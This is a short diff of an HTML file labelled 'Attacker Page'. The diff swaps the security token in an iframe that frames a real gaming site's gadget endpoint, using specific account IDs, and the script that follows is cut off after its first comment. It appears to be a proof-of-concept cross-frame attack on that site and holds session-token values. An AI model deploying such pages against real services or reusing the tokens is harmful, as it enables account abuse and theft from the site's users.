--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=pHMnD5xpQ2w%2BkXfzngx%2FPq8jw%2BhitxkREV1w4PMTaeeWP9N1SBdaoRPqj7FJqNFSTtER%2BsODcD0Rl3lmTAAl0TdvuePC6%2BOMruEDpxKwH%2FZV%2BEz7I4n4xxvHvbeEGjs7IdG%2FltWK3357yvYAgfK0r4vkkbURc0QRD7aWZpdyRmE7hs6IdYFxLa2KijjkZsotcGjtjDozQGZ6rAmr5F1ASLYfG7WLv6gYMwqe7LW0OcEj5Xumr%2FWN5iJLwBfTCxzySl25OZzJA%2FyVfk4OhWMGxzRTzGo%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=wLNhFNmVkX7jmjzd72xr4cUA802aMw1MoMvKlrweWeXRaYWFU9ZrCMQ7KLXQja1tiru13nXvgG1nJ9quiKBvv%2FryV2vALXUTq4XT4%2Bqbu8aq1qF8y6xSuVa9PvUt3YkSTwXAOYHPnUFy8zVQmG4mio1FD1cUWvGTd1nOs07YaK5PowR1JG9lkSJMCMdHcdXzVp6V5ynugcKdK%2Fw0x%2FfZex5RXd29k8D9G1Ua48cb2SgK%2BzTv6Uo1Gt27DebPO5gwV99anlviZHXBjVd2k5EA4WsmQLM%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
